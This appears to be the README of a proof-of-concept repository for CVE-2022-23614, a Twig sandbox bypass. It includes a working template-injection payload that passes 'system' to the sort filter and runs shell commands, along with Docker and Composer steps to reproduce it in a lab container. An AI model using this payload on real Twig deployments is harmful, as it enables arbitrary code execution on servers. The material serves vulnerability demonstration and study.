Proof of concept (PoC) for CVE-2022-23614 referenced in the DSA-5107-1.
- CVSS-2.0: 7.5
- CVSS-3.X: 9.8
Twig is a flexible, fast, and secure template engine for PHP. Notably, it is possible to use filters in a template before rendering it. The sort
filter can be used to sort the elements of an array with the following structure:
{{ [5,8,2,3]|sort('desc') }}
Twig has a sandbox mode to evaluate untrusted template code. When in this sandbox mode, the arrow
parameter of the sort
filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code.
{{ ["id",""]|sort('system') }}
This PoC illustrates the vulnerability in two different use cases: either using Debian php-twig
(v2.14.1) package or using Composer twig/twig
(v2.14) module.
The index.php
file crafts a Twig template based on the first argument. In the following code, argv[1]
is the name of the sorting function that will be used by Twig when rendering.
// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";
Then, index.php
will use two deprecated functions of Twig to load the generated template. Eventually, it uses the second argument (argv[2]
) to pass data to the template as it is being rendered, notably the args
array that we want to sort.
// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);
The rendered template is then printed in the standard output.
Please note this repository was made for demonstration purposes only. It is meant to be simple to understand and easy to use in order to play with the CVE using only a command line interface. It is quite far from what one can find on an actual vulnerable server.
Using Docker, we are able to recreate the context of the original Debian Security Advisory (DSA). You can use the given build-docker.sh
script in order to properly build and run the vulnerable container.
chmod a+x build-docker.sh
./build-docker.sh
The container should shut down once the payload is executed (an id
command). If you want to try your own commands, you can run the container in interactive mode:
docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash
Once in the container, you can craft your own payload using the following model:
php index.php system '{"args":["id",""]}'
^ ^
sorting function array to sort
This dockerfile was partially created using DECRET.
If you have php and Composer already installed on your machine, you can replicate the exploit using the vulnerable Composer module.
cd exploit
composer install
Then you just have to play with the payload.
php index.php system '{"args":["id",""]}'
CVE details: https://nvd.nist.gov/vuln/detail/CVE-2022-23614
DSA: https://www.debian.org/security/2022/dsa-5107
Patch commit: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9
PoC by davwwwx (using GUI): https://github.com/davwwwx/CVE-2022-23614